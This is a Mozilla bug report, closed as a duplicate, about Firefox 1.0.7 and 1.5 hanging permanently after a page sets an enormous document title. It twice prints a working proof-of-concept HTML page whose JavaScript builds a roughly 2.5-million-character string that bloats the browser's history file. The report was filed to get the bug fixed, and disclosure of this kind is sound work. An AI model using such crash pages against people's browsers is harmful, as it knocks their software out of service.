Closed Bug 324020 Opened 19 years ago Closed 19 years ago

buffer overflow with javascript, causes crash and Firefox never starts again

Categories

(Firefox :: General, defect)

Product:
Firefox
Component:
General
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED DUPLICATE of bug 319004

People

(Reporter: maksrules, Unassigned)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: MMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5

<html><head><title>heh</title><script type="text/javascript">
function ex() {
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 500; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>

This small html will have a CLICK ME, which call a javascript routine. This routine overflows internal buffer and overwrites something in the program. Browser still works until you close it and restart it. Then the browser "hangs" and doesn't seem to work. In Task Manager it shows to take 53 MB instead of usual 18. CPU is 100% busy. 

Reinstall of the Firefox doesn't work. It appears, that in Application Data folder(application data/mozilla/firefox/profiles/...), the history.dat is modified. When history.dat deleted, firefox recovers. Also, history.dat increases in size for over 9 MB.

Apparently, buffer is overflowed. A malicious software could use this to modify the code of the Firefox while operating. This can be very unsecure.

This bug was found on Firefox 1.0.7 and inspected in Firefox 1.5. A friend showed me this thing.

Reproducible: Always

Steps to Reproduce:
1.in a blank text file, print this:

 <html><head><title>heh</title><script type="text/javascript">
function ex() {
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 500; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>


2. Save it with .html extension
3.Exit and open. Then click "CLICK ME"



Expected Results:  
Buffer overflow should be detected and prevented.

Works on firefox 1.0.7 and 1.5. A friend shwed me this bug - he found it on the internet, securitylab.ru

*** This bug has been marked as a duplicate of 319004 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.